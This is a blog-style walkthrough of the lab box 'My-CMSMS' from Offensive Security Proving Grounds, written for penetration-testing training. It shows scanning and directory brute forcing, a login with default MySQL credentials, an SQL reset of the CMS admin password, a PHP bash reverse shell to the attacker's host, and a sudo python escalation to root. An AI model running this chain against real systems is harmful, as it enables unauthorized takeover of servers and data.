PG — My-CMSMS— Walkthrough (Offensive Security Proving Grounds Play Boxes)

Introduction

This article aims to walk you through My-CMSMC box, produced by Pankaj Verma and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s Proving Grounds Play or Practice can try to pwn this Linux box, this is an intermediate and fun box. Hope you enjoy reading the walkthrough!

Reconnaissance

As we are already provided with IP address of the box, we will scan it via Nmap.

Scanning

We are going to scan the IP for all open ports by typing the following command on our terminal.

nmap -p- 192.168.x.x

After waiting for a while, we have got our results as shown below:

Nmap Port Scan

To gather further information on ports found by nmap, we will add some more arguments specifying open ports. -sV will scan to show service versions of applications on open ports, and -sC will run default scripts on services in order to check whether there is a vulnerability.

nmap -p 22,80,3306 192.168.x.x -sV -sC

In a short while, we have got our results and more details regarding open ports. And we decide to start enumeration on port 80 since port 22 is not a logical starting point because it does not provide us with a broad attack surface as an http server does. Then, we will go on enumeration on port 3306 which is a default MySQL database server.

Nmap Specified Port Scanning

Enumeration

We open our browser and type IP address of the box and come accross with CMS Made Simple.

Http Enumeration

Since we have a CMS installed on Http server, we will enumerate further to see if we have a public exploit. So we searchsploit CMS name.

Searchsploiting CMS Name

We see that there are a number of public exploits for CMS Made Simple, but most of them are Authenticated, which means we need valid credentials to be able to use them.

We will brutefore directories with gobuster to see if there is a useful directory.

gobuster dir -u http://192.168.x.x/ -w /usr/share/wordlists/dirb/common.txt -t 5

Directory Bruteforcing

We find two directories /admin and /phpmyadmin by which we can have a foothold on the box if default credentials work.

Admin Directory Enumeration

We use default credentials such as admin:admin to log in on the page in /admin directory, but they do not work.

Phpmyadmin Enumeration

Default credentials do not work on /phpmyadmin as well.

In this case, we have MySQL server on port 3306, so we will try default MySQL credentials root:root on it to see if we are able to connect.

mysql -h 192.168.x.x -u root -p

Connecting to Mysql Server

We are able to connect to MySQL server. Now, let us exploit it.

Exploitation

As we are able to connect to MySQL server as root. We will enumerate databases and users on the server.

Enumerating MySQL

We use cmsms_db to enumerate further, and we will try to

select username,email,password from cms_users;

Enumerating MySQL

We have admin as user on the web server, so we will try to change admin password with following command in md5.

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = ‘sitemask’),’ ’), ‘caesar’))) where username = ‘admin’;

Changing Admin Passowrd

We have got no warnings, which means password is changed successfully. Now we will log in on the Http server with credentials we just changed through MySQL.

Dashboard of CMS Made Simple

After a little bit of googling, we learn that we can execute commands on the server as follows:

Command Execution on the Server

We click on Extensions, then we click on User defined Tags, and we will edit user_agent tag in order to be able to execute commands on the server.

System Command Execution

We write the following command in order to get a reverse shell.

system(“bash -c ‘bash -i >& /dev/tcp/192.168.x.x/443 0>&1’”);

Now, we will set up a netcat listener on port 443.

Setting up Netcat Listener

And curl the link that we submitted our command.

curl -vv http://192.168.x.x/index.php?page=user-defined-tags

Curling the Link to Execute Command

Let us chek our netcat listener to see if our command executed on the server.

Getting a Reverse Shell

And we have got a shell on the server. Now, it is time to get the low shell hash.

Low Shell Hash

Privilege Escalation

We enumerate the machine to find weak services and files on the server.

Enumerating Files and Services

And we discover .htpasswd file in /var/www/html/admin directory, which includes a base64 text.

Enumerating Files and Services

We will decode base64 text on our attacking box to see what it is.

Decoding Base64 Text

We decode it and encounter another text that is encoded in base32. So we decode it as well and get a user name and a password.

We try to log in armour user with SSH server, but we are not allowed to log in.

SSH Server Login Attempt

As we are not able to use SSH, we will try to escalate to armour user on the shell we have. And then get a TTY shell.

Login to Armour User and Getting TTY Shell

Now we check sudo permissions for the current user by typing sudo -l on the terminal, and we see that we can use python with root privileges.

Enumerating for Privilige Escalation

So, we will use sudo command in the beginning of the process that we use for getting a TTY shell, with the help of getting a TTY shell with sudo, we will be root on the box.

sudo /usr/bin/python -c ‘import pty;pty.spawn(“/bin/bash”)’

Python Privilege Escalation

And we get root hash.

Getting Root Hash

Now we have full authority on the box. Enjoy!

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store